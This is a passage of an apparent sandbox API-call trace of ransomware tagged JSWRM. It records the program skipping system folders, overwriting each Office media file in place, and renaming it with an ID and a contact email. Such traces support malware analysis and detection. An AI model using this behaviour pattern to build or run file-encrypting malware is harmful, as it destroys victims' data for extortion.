lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\CAMERA.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\camera.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.891] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5524) returned 1 [0134.891] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.891] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1590, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1590, lpOverlapped=0x0) returned 1 [0134.893] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.893] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1590, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1590, lpOverlapped=0x0) returned 1 [0134.893] CloseHandle (hObject=0x238) returned 1 [0134.893] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\CAMERA.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\camera.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\CAMERA.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\camera.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.894] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af55fee, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af55fee, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1af7c22b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d7f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="CASHREG.WAV", cAlternateFileName="")) returned 1 [0134.894] lstrcmpiW (lpString1="CASHREG.WAV", lpString2=".") returned 1 [0134.895] lstrcmpiW (lpString1="CASHREG.WAV", lpString2="..") returned 1 [0134.895] lstrcmpiW (lpString1="CASHREG.WAV", lpString2="...") returned 1 [0134.895] lstrcmpiW (lpString1="CASHREG.WAV", lpString2="windows") returned -1 [0134.895] lstrcmpiW (lpString1="CASHREG.WAV", lpString2="recovery") returned -1 [0134.895] lstrcmpiW (lpString1="CASHREG.WAV", lpString2="perflogs") returned -1 [0134.895] lstrcmpiW (lpString1="CASHREG.WAV", lpString2="documents and settings") returned -1 [0134.895] lstrcmpiW (lpString1="CASHREG.WAV", lpString2="$RECYCLE.BIN") returned 1 [0134.895] lstrcmpiW (lpString1="CASHREG.WAV", lpString2="system volume information") returned -1 [0134.895] lstrcmpiW (lpString1="CASHREG.WAV", lpString2="msocache") returned -1 [0134.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CASHREG.WAV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0134.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CASHREG.WAV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CASHREG.WAV", lpUsedDefaultChar=0x0) returned 11 [0134.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CASHREG.WAV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0134.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CASHREG.WAV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CASHREG.WAV", lpUsedDefaultChar=0x0) returned 11 [0134.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\CASHREG.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\cashreg.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.896] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7551) returned 1 [0134.896] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.896] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1d70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1d70, lpOverlapped=0x0) returned 1 [0134.898] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.898] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1d70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1d70, lpOverlapped=0x0) returned 1 [0134.898] CloseHandle (hObject=0x238) returned 1 [0134.898] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\CASHREG.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\cashreg.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\CASHREG.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\cashreg.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.899] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af55fee, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af55fee, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1af55fee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x91be, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="CHIMES.WAV", cAlternateFileName="")) returned 1 [0134.899] lstrcmpiW (lpString1="CHIMES.WAV", lpString2=".") returned 1 [0134.899] lstrcmpiW (lpString1="CHIMES.WAV", lpString2="..") returned 1 [0134.899] lstrcmpiW (lpString1="CHIMES.WAV", lpString2="...") returned 1 [0134.899] lstrcmpiW (lpString1="CHIMES.WAV", lpString2="windows") returned -1 [0134.899] lstrcmpiW (lpString1="CHIMES.WAV", lpString2="recovery") returned -1 [0134.899] lstrcmpiW (lpString1="CHIMES.WAV", lpString2="perflogs") returned -1 [0134.899] lstrcmpiW (lpString1="CHIMES.WAV", lpString2="documents and settings") returned -1 [0134.899] lstrcmpiW (lpString1="CHIMES.WAV", lpString2="$RECYCLE.BIN") returned 1 [0134.899] lstrcmpiW (lpString1="CHIMES.WAV", lpString2="system volume information") returned -1 [0134.899] lstrcmpiW (lpString1="CHIMES.WAV", lpString2="msocache") returned -1 [0134.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHIMES.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHIMES.WAV", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHIMES.WAV", lpUsedDefaultChar=0x0) returned 10 [0134.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHIMES.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHIMES.WAV", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHIMES.WAV", lpUsedDefaultChar=0x0) returned 10 [0134.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\CHIMES.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\chimes.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.900] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37310) returned 1 [0134.900] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.901] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x91b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x91b0, lpOverlapped=0x0) returned 1 [0134.909] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.909] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x91b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x91b0, lpOverlapped=0x0) returned 1 [0134.909] CloseHandle (hObject=0x238) returned 1 [0134.909] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\CHIMES.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\chimes.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\CHIMES.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\chimes.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.911] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a960163, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a960163, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x268, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="CLICK.WAV", cAlternateFileName="")) returned 1 [0134.911] lstrcmpiW (lpString1="CLICK.WAV", lpString2=".") returned 1 [0134.911] lstrcmpiW (lpString1="CLICK.WAV", lpString2="..") returned 1 [0134.911] lstrcmpiW (lpString1="CLICK.WAV", lpString2="...") returned 1 [0134.911] lstrcmpiW (lpString1="CLICK.WAV", lpString2="windows") returned -1 [0134.911] lstrcmpiW (lpString1="CLICK.WAV", lpString2="recovery") returned -1 [0134.911] lstrcmpiW (lpString1="CLICK.WAV", lpString2="perflogs") returned -1 [0134.911] lstrcmpiW (lpString1="CLICK.WAV", lpString2="documents and settings") returned -1 [0134.911] lstrcmpiW (lpString1="CLICK.WAV", lpString2="$RECYCLE.BIN") returned 1 [0134.911] lstrcmpiW (lpString1="CLICK.WAV", lpString2="system volume information") returned -1 [0134.911] lstrcmpiW (lpString1="CLICK.WAV", lpString2="msocache") returned -1 [0134.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLICK.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0134.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLICK.WAV", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLICK.WAV", lpUsedDefaultChar=0x0) returned 9 [0134.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLICK.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0134.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLICK.WAV", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLICK.WAV", lpUsedDefaultChar=0x0) returned 9 [0134.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\CLICK.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\click.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.912] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=616) returned 1 [0134.912] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.912] ReadFile (in: hFile=0x238, lpBuffer=0x207860, nNumberOfBytesToRead=0x260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesRead=0x345e89c*=0x260, lpOverlapped=0x0) returned 1 [0134.913] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.913] WriteFile (in: hFile=0x238, lpBuffer=0x207860*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesWritten=0x345e898*=0x260, lpOverlapped=0x0) returned 1 [0134.913] CloseHandle (hObject=0x238) returned 1 [0134.913] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\CLICK.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\click.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\CLICK.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\click.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.916] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a939f30, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a939f30, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a960163, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15bc, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="COIN.WAV", cAlternateFileName="")) returned 1 [0134.916] lstrcmpiW (lpString1="COIN.WAV", lpString2=".") returned 1 [0134.916] lstrcmpiW (lpString1="COIN.WAV", lpString2="..") returned 1 [0134.916] lstrcmpiW (lpString1="COIN.WAV", lpString2="...") returned 1 [0134.916] lstrcmpiW (lpString1="COIN.WAV", lpString2="windows") returned -1 [0134.916] lstrcmpiW (lpString1="COIN.WAV", lpString2="recovery") returned -1 [0134.916] lstrcmpiW (lpString1="COIN.WAV", lpString2="perflogs") returned -1 [0134.916] lstrcmpiW (lpString1="COIN.WAV", lpString2="documents and settings") returned -1 [0134.916] lstrcmpiW (lpString1="COIN.WAV", lpString2="$RECYCLE.BIN") returned 1 [0134.916] lstrcmpiW (lpString1="COIN.WAV", lpString2="system volume information") returned -1 [0134.916] lstrcmpiW (lpString1="COIN.WAV", lpString2="msocache") returned -1 [0134.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COIN.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0134.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COIN.WAV", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COIN.WAV", lpUsedDefaultChar=0x0) returned 8 [0134.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COIN.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0134.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COIN.WAV", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COIN.WAV", lpUsedDefaultChar=0x0) returned 8 [0134.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\COIN.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\coin.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.917] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5564) returned 1 [0134.917] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.917] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x15b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x15b0, lpOverlapped=0x0) returned 1 [0134.919] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.919] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x15b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x15b0, lpOverlapped=0x0) returned 1 [0134.919] CloseHandle (hObject=0x238) returned 1 [0134.919] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\COIN.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\coin.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\COIN.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\coin.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.920] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a939f30, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a939f30, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1af55fee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfe669, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="DefaultHold.wma", cAlternateFileName="DEFAUL~1.WMA")) returned 1 [0134.920] lstrcmpiW (lpString1="DefaultHold.wma", lpString2=".") returned 1 [0134.920] lstrcmpiW (lpString1="DefaultHold.wma", lpString2="..") returned 1 [0134.920] lstrcmpiW (lpString1="DefaultHold.wma", lpString2="...") returned 1 [0134.920] lstrcmpiW (lpString1="DefaultHold.wma", lpString2="windows") returned -1 [0134.920] lstrcmpiW (lpString1="DefaultHold.wma", lpString2="recovery") returned -1 [0134.920] lstrcmpiW (lpString1="DefaultHold.wma", lpString2="perflogs") returned -1 [0134.921] lstrcmpiW (lpString1="DefaultHold.wma", lpString2="documents and settings") returned -1 [0134.921] lstrcmpiW (lpString1="DefaultHold.wma", lpString2="$RECYCLE.BIN") returned 1 [0134.921] lstrcmpiW (lpString1="DefaultHold.wma", lpString2="system volume information") returned -1 [0134.921] lstrcmpiW (lpString1="DefaultHold.wma", lpString2="msocache") returned -1 [0134.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultHold.wma", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0134.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultHold.wma", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultHold.wma", lpUsedDefaultChar=0x0) returned 15 [0134.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultHold.wma", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0134.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultHold.wma", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultHold.wma", lpUsedDefaultChar=0x0) returned 15 [0134.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\DefaultHold.wma" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\defaulthold.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.922] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1042025) returned 1 [0134.922] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.922] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0134.934] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.934] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0134.935] CloseHandle (hObject=0x238) returned 1 [0134.935] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\DefaultHold.wma" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\defaulthold.wma"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\DefaultHold.wma.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\defaulthold.wma.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.936] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, 